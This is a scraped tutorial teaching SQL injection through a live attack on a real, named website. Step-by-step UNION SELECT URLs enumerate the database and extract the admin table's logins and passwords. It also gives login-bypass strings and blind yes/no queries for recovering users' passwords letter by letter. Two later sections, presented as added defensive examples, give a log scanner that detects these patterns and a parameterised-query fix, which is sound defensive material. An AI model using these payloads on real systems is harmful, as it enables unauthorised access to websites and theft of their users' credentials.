How To Use SQL Injection 1

This document provides instructions on how to perform SQL injection attacks to exploit vulnerabilities on websites. It describes how to: 1) Test a website for SQL injection vulnerabilities by inserting malicious SQL code into vulnerable form fields. 2) Determine the number of columns in a database table by incrementally adding columns to SQL queries. 3) Use functions like database(), version(), and load_file() to extract information about the database. 4) Query the information_schema tables to identify database and table names, as well as column names and contents. 5) Extract usernames and passwords by injecting SQL queries through vulnerable login forms.

Uploaded by sanj083
Copyright © Attribution Non-Commercial (BY-NC)

How to use SQL Injection?

Best Online Tutorial for SQL Injection

Thanks to Inxroot & aa_numb from Indishell for this valuable piece of cake.

[NOTE: This is for educational purpose only.]

This is a practical tutorial... as long as this .pk site is up!

So let's start. Here is the website on which this live testing was done: http://www.depo.org.pk

Try to find variables being passed to the inner script:

http://www.depo.org.pk/index.php?a=newsdetail&id=1

Here &id= is the variable passing values to SQL.

Check whether it is vulnerable or not: put ' in place of 1 as shown below.

depo.org.pk/index.php?a=newsdetail&id='

If it shows an error, then we can apply SQLi on this URL. Now we need to determine the number of
columns in the current table.

Increase the number until you get rid of the error 'The used SELECT statements have a different number of
columns':

+1
+1,2
+1,2,3
+1,2,3,4
+1,2,3,4,5
+1,2,3,4,5,6
+1,2,3,4,5,6,7
+1,2,3,4,5,6,7,8 ... in this order, to find the number of columns.

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8

BINGO!!! Here we get no error.

Here we use SQL functions directly from the browser.

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,database(),version(),4,5,6,7,8

database:- depo
version:- 5.0.45-log

------------------------------------------------

Several useful functions (http://dev.mysql.com/doc/refman/5.0/en/functions.html)

user()
database()
version()
current_user()
load_file()
hex()
unhex()
char()
concat()
group_concat()

------------------------------------------------

Now we need to know the structure of the victim's MySQL database.

NOTE: MySQL keeps information about every table and column in 'information_schema'.

Attach the SQL query '+from+information_schema.tables+where+table_schema=database()' at the
end of the column numbers!

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()

Now we want to fetch the table structure of the database named 'depo'!

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()

Table names
admin,feedback,ideas,inquiry,members_detail_page,
members_detail_page_pictures,news,newsletter,
org_prod_categories,organizations,orginquiry,pages,
product_categories,products,products_pictures,profile

Now it's the turn of the columns!

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8+from+information_schema.columns+where+table_schema=database()

Column names

id,login,password,id,name,
company,email,country,learnsite,
visits,content,graphics,loading,organization,
comments,date,id,fname,lname,nic,occupation,
designation,organization,address,
country,city,state,zip,phone,fax,email,website,
date,id,country,agency,telephone,fax,email,website,
demand,company,address,date,id,heading_one,
text_one,heading_two

Heyaa, it's time to fetch the Id and password from the table Admin!

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat%28login,0x3a,password%29,3,4,5,6,7,8+from+admin
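Seen from the server side, the walkthrough above leaves a recognisable trail: a numeric id parameter that suddenly carries a lone quote, then a run of UNION SELECT requests with a growing column list, then information_schema and group_concat() lookups, all from one client. The following Python script is an added defensive example, not code from the tutorial or the site it tests; it scans constructed Apache-style access-log lines (sample data, RFC 5737 addresses) for those patterns after URL-decoding the query string, so that %28 / %29 and + encoding do not hide the keywords.

```python
"""Scan web-server access-log lines for the UNION / information_schema probing
patterns walked through in the tutorial (defensive detection, constructed data)."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed Apache combined-format log lines: sample data, not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?a=newsdetail&id=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?a=newsdetail&id=' HTTP/1.1" 500 614 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8 HTTP/1.1" 200 4988 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:56:30 +0000] "GET /index.php?a=newsdetail&id=-1+union+select+1,group_concat%28table_name%29,3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database%28%29 HTTP/1.1" 200 5230 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:13:57:10 +0000] "GET /index.php?a=newsdetail&id=42 HTTP/1.1" 200 5090 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:13:57:15 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 3011 "-" "Mozilla/5.0"
"""

# Pulls client address, request path (with query string) and status out of one log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is applied to the decoded, whitespace-normalised parameter value.
RULES = [
    ("union_select", re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
    ("enum_function", re.compile(
        r"\b(group_concat|load_file|database|version|user|current_user)\s*\(", re.I)),
]


def decode_param(value: str, rounds: int = 2) -> str:
    """Percent-decode repeatedly (cheap defence against double encoding), then
    collapse whitespace so the regexes see one space between keywords."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", " ", value)


def flag_request(path: str, numeric_params=("id",)) -> list:
    """Return the sorted names of every rule the request's query string trips.
    Parameters listed in numeric_params are expected to be integers, so a lone
    quote or a UNION payload in 'id' is caught even before keyword matching."""
    hits = set()
    for name, raw in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        value = decode_param(raw)
        if name in numeric_params and not re.fullmatch(r"-?\d+", value):
            hits.add(f"non_numeric_{name}")
        for rule, pattern in RULES:
            if pattern.search(value):
                hits.add(rule)
    return sorted(hits)


def scan_log(log_text: str) -> list:
    """Parse each access-log line; return (ip, status, path, rules) for flagged ones."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        hits = flag_request(m["path"])
        if hits:
            findings.append((m["ip"], int(m["status"]), m["path"], hits))
    return findings


def by_source(findings) -> dict:
    """Count flagged requests per client address: one source stepping through
    quote -> UNION -> information_schema is the tutorial's workflow as a server sees it."""
    counts = {}
    for ip, _status, _path, _rules in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip, status, path, rules in found:
        print(f"{ip} {status} {path}\n    -> {', '.join(rules)}")
    print("flagged requests per source:", by_source(found))
```

The "union station" search request is deliberately included to show that the rules key on the UNION ... SELECT pair, not on the bare word; in a real deployment the numeric_params list would be derived from the application's routes, and the per-source counts would feed a threshold alert rather than a print.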

How to Identify a Site Vulnerable to an SQL Injection Attack

- If a web page accepts text entry (for example a user name and password) then try entering
a string that contains one single quote.
- A vulnerable site may behave oddly given this input. You may see an error message such
as that shown:

[screenshot of the error message not reproduced]

By-Pass authentication using SQL Injection

Take a guess

- Before hacking the system, try to guess a user name and password. Unless you are very
lucky you will not get into the system. To know more about PASSWORD GUESSING,
CLICK HERE.

Force an Error

- If you enter a string with a single quote in it such as O'Brien for either user name or
password you will get a Software Error as the SQL is invalid and cannot be parsed.

Force Entry

- If you enter the string ' OR ''=' as both user name and password you can ensure that the
WHERE clause always returns true. Without knowing any user names or passwords you
can by-pass the log in screen. In this example you get the user name of the first person in
the table.

The magic string works because the program evaluates:

SELECT name from users WHERE name='name' AND password='password'

as the 'always true' string:

SELECT name from users WHERE name='' OR ''='' AND password='' OR ''=''

Find Table Names using SQL Injection.

In which we discover the names of the tables available for viewing. The function DATABASE()
will give you that value. When you know the name of the database being used you can take
guesses at the names of the tables.

Does the current database contain the letter j?

' OR EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%j%') AND ''='

Is there a table called one in database test?

' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='test' AND TABLE_NAME='one') AND ''='

Is there more than one table in the database(s) containing a j?

' OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE '%j%')>1 AND ''='

[image: list of PTU students' usernames and passwords, not reproduced]

Find user names using SQL Injection:

You can only ask yes/no questions, but you can find out just about anything you want to with a
little patience.

Use xx for the user name and enter the following as the password:

Are there more than 10 rows in the password table?

' OR (SELECT COUNT(*) FROM users)>10 AND ''='

Is there a user with an r in his name?

' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='

Is there a user (other than ajaypal) with an a in his name?

' OR EXISTS(SELECT * FROM users WHERE name!='ajaypal' AND name LIKE '%a%') AND ''='

In the same way you can find other users on the system. In the string below we choose to probe mandeep's
password.

' OR EXISTS(SELECT * FROM users WHERE name='mandeep' AND password LIKE '%w%') AND ''='

Find a password: how to discover the password for a user if you know the name of the
password table and a user account.

You can now get the system to answer questions about the password table. It will only ever
answer yes (and let you in) or no (by refusing entry). Your questions must take the form of a
valid SQL query. In each case use xx for the user name and the text shown as the password. You
can ask questions such as:

Does jake's password have a w in it?

' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='

Does jake's password start with w?

' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE 'w%') AND ''='

Does jake's password have a w followed by a d?

' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%d%') AND ''='

Is the fourth letter of jake's password w?

' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '___w%') AND ''='

This works because the LIKE command uses % and _ as wildcards. The % wildcard matches any
string, the _ wildcard matches a single character.
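Both halves of the login section, the ' OR ''=' bypass and the yes/no EXISTS ... LIKE probes, rest on the same defect: the user's text becomes part of the SQL statement. The Python/sqlite3 program below is an added example, not the tutorial's code or the tested site's, showing the login query exactly as the page writes it (built by string splicing) next to its parameterised form, and what each returns for the magic string and the jake probes. Accounts are constructed sample data; SQLite stands in for MySQL so it runs offline, and the MySQL-only dual probe is left out.

```python
"""Vulnerable vs. parameterised login, exercised with the strings from the text.
Constructed sample data; SQLite replaces MySQL so the demo runs offline."""
import sqlite3

# Constructed accounts, not real credentials. Passwords are stored in clear
# to mirror the tutorial's target; a real system would store only a salted hash.
SAMPLE_USERS = [("ajaypal", "s3cret"), ("jake", "wander"), ("mandeep", "willow")]

# Strings from the text: the always-true bypass and two yes/no probes.
MAGIC = "' OR ''='"
PROBE_TRUE = "' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE 'w%') AND ''='"
PROBE_FALSE = "' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE 'z%') AND ''='"


def make_db() -> sqlite3.Connection:
    """In-memory users table shaped like the page's 'SELECT name from users' query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, name: str, password: str):
    """The pattern the page exploits: input spliced into the statement text, so a
    quote in the input ends the string literal and the rest is parsed as SQL."""
    sql = f"SELECT name FROM users WHERE name='{name}' AND password='{password}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, name: str, password: str):
    """Parameterised form: the statement is fixed and the values travel separately,
    so quotes, OR, EXISTS and LIKE in the input are compared as data, never parsed."""
    row = conn.execute(
        "SELECT name FROM users WHERE name=? AND password=?", (name, password)
    ).fetchone()
    return row[0] if row else None


def demo() -> dict:
    """Run both logins against the page's strings and collect the outcomes."""
    conn = make_db()
    return {
        # WHERE name='' OR ''='' AND password='' OR ''='' is true for every row,
        # so the first row's name comes back, as the text describes.
        "vuln_magic": login_vulnerable(conn, MAGIC, MAGIC),
        "safe_magic": login_safe(conn, MAGIC, MAGIC),
        # The probe's EXISTS(...) decides whether any row is returned: jake's
        # constructed password starts with w, so the 'w%' question answers yes.
        "vuln_probe_true": login_vulnerable(conn, "xx", PROBE_TRUE),
        "vuln_probe_false": login_vulnerable(conn, "xx", PROBE_FALSE),
        # With parameters there is no user literally named xx, so every probe is a no.
        "safe_probe_true": login_safe(conn, "xx", PROBE_TRUE),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:17s} -> {result!r}")
```

The vulnerable function answers the probe with a login or a refusal, which is the one-bit oracle the text describes; the parameterised function answers every probe with a refusal, so the wildcards in LIKE never reach the parser. Escaping quotes by hand is not an equivalent fix: it has to be applied to every parameter on every query, while binding parameters closes the whole class at once.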
